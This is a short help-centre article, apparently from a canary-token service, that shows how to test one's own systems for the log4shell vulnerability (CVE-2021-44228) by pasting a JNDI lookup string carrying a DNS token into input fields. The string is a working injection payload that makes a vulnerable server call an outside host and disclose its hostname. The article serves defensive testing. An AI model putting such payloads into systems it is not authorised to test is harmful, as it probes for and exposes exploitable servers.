Skip to main content

Search

Using a Canarytoken to help test for CVE-2021-44228 (log4j/log4shell)

You can use the DNS Canarytoken to help you test for CVE-2021-44228.

 

1) On your console, Click on "Add new Canarytoken"

2021-12-11_10-27-45.png

2) Select the "DNS" token

2021-12-11_10-28-09.png

 

3) Enter a memo for the token (like: Testing log4shell #1)

2021-12-11_10-28-41.png

4) The server will generate a DNS based token for you. Copy this Token.

2021-12-11_10-29-06.png

5) Place this copied token in the jndi:ldap string as follows:

${jndi:ldap://x${hostName}.L4J.INSERT-COPIED-STRING-HERE/a}

For example the updated string will look as follows:

${jndi:ldap://x${hostName}.L4J.v52p1gxtas0p238iu99vj9rpx.c7b9c059bd9a.o3n.io/a}

Place the resultant string into search boxes and fields that will be parsed by your logging libraries, and if one of them is vulnerable, you will receive a notification that includes the hostname of the vulnerable server.

You can read more on this issue at LunaSec

Was this article helpful?
61 out of 79 found this helpful
Return to top